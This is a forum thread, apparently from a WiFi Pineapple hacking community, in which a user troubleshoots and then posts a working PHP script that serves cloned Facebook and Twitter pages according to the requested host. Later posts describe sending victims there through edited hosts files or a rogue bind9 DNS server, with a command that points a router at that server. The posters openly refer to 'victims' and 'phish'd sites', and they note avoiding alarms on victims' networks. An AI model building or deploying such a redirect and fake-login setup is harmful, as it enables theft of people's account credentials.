Jump to content

Redirect.php Problems


Recommended Posts

Hey guys, having a small problem with redirect.php that's driving me insane. Probably nothing, but it's starting to eat up time.

<?php
$ref = $_SERVER['HTTP_REFERER'];

if (strpos($ref, "facebook"))   { header('Location: facebook.html'); }
if (strpos($ref, "twitter"))    { header('Location: twitter.html'); }
if (strpos($ref, "hotmail"))    { header('Location: Hotmail.htm'); }
if (strpos($ref, "live"))       { header('Location: Hotmail.htm'); }
if (strpos($ref, "gmail"))      { header('Location: Gmail.htm'); }
if (strpos($ref, "yahoo"))      { header('Location: Yahoo.htm'); }

require('peets.html');
?>

The problem is when I type "facebook.com" into my VM's browser it just hangs at "facebook.com/redirect.php" and nothing displays on the page. It seems that there is an issue in redirect.php but I can't seem to finger it.

The victim machine is an XP SP2 box running firefox 12. The victim is being redirected to this malicious site via an edited hosts file.

The server has been tested and PHP5 is working, it's an Ubuntu Server running apache2 for the webserver.

Link to comment
Share on other sites

Starting to see what you mean peter but I don't think apache2 is picking up on index.php for whatever reason. Looked in /etc/apache/apache2.conf and didn't see anything about index.php/html or landing pages in general, but did notice a reference to a .htaccess file. Would you be able to advise me if I should look further in apache's config files or would I need to create a .htaccess file to get it to recognize index.php (With the redirect code) as the landing page?

EDIT - added "DirectoryIndex index.php" to /etc/apache2/httpd.conf but still no luck.

Edited by bobbyb1980
Link to comment
Share on other sites

Got apache2 to recognize index.php as the landing page after adding the same line in .htaccess as I did in httpd.conf.

Is this what my index.php file should look like to properly execute this attack?

<?php
$ref = $_SERVER['HTTP_REFERER'];

if (strpos($ref, "facebook"))   { header('Location: facebook.html'); }

require('peets.html');
?>

Everything seems to be working, but it is not redirecting properly, it keeps redirecting the requests to peets.html even though facebook.com was typed into the browser.

Edited by bobbyb1980
Link to comment
Share on other sites

Solved. For all those out there wondering, to get this setup working in apache, first you need to edit the httpd.conf to recognize index.php as the landing page (if that doesn't work then add the same line in /var/www/.htaccess).

The create index.php and paste the following could and it should work fine. Tested with firefox and IE in Windows and it seems to be working ok.

<?php
$ref = $_SERVER['HTTP_HOST'];
if (strpos($ref, 'facebook.com') !== FALSE){ include('facebook.html') ;}
if (strpos($ref, 'twitter.com') !== FALSE){ include('twitter.html') ;}
exit;
require('error.php');
?>

Link to comment
Share on other sites

Im glad you got it figured:-D

but I don't know what all this apache stuff is for, I have never had to mess with or have come across it?

What version of pineapple is it? as well as firmware version?

I was wondering the same thing.

Either he is using a web-server on his virtual machine OR he has installed Apache2 as the web-server on the pineapple.

The reason this is not done by default is because uhttpd is much smaller and lightweight.

Either way, glad you got it sorted out!

Link to comment
Share on other sites

I use a different method with my pineapple. I prefer not to use arp-based spoofing attacks as I've had it set off alarms in certain victims. Without going into a 10 page explanation, simply put -

I prefer to use create my own DNS zones files and host them on a remote bind9 DNS server. The DNS server, redirects all the desired sites to an apache2 server. This way the victim can still get internet if they're not going to one of the phish'd sites.

The apache2 server is configured exactly like the httpd server on the pineapple would be. Since it is over the internet I prefer to use apache for security reasons.

Definitely need to brush up on my PHP : (

Link to comment
Share on other sites

I use a different method with my pineapple. I prefer not to use arp-based spoofing attacks as I've had it set off alarms in certain victims. Without going into a 10 page explanation, simply put -

I prefer to use create my own DNS zones files and host them on a remote bind9 DNS server. The DNS server, redirects all the desired sites to an apache2 server. This way the victim can still get internet if they're not going to one of the phish'd sites.

The apache2 server is configured exactly like the httpd server on the pineapple would be. Since it is over the internet I prefer to use apache for security reasons.

Definitely need to brush up on my PHP : (

That sounds awesome bobbi! I'm sure I wouldn't be the only one who'd love a how-to guide on this. If you're up to it, I think itd be a great addition to combine with the other remote server based features like reverse ssh, cron'd remote log uploading, etc

telot

Link to comment
Share on other sites

Hey telot, I've actually been working on a python script that create zones files in bind9, so a user could just setup ICS and do either

uci set network.lan.dns=ROUGUE_DNS_IP

Or edit the /etc/config/dhcp and replace it with the rogue server addy.

I'm currently in the process of writing a python script to automate the task of creating DNS zone files in bind9. My goal is to let the user specify a simple url and IP to resolve to. Say hak5.com and gmail.com would resolve to the local listening httpd server (or a remote apache2) depending on the setup. However due to the nature of bind9, every time a change in the server is made (or possibly in a reverse lookup file) a number must be appended and I'm still not quite sure what number it is. I have it working, but only on one bind9 server, haven't tried a different one and need to figure this last bit out before the process can be easily replicated.

In this script, I've gotten so far as named.conf, named.conf.local, named.conf.options, a .db zone file, and a reverse lookup file. This however is not the whole task but I'd be more than happy to post what I have of that script if anyone is interested.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...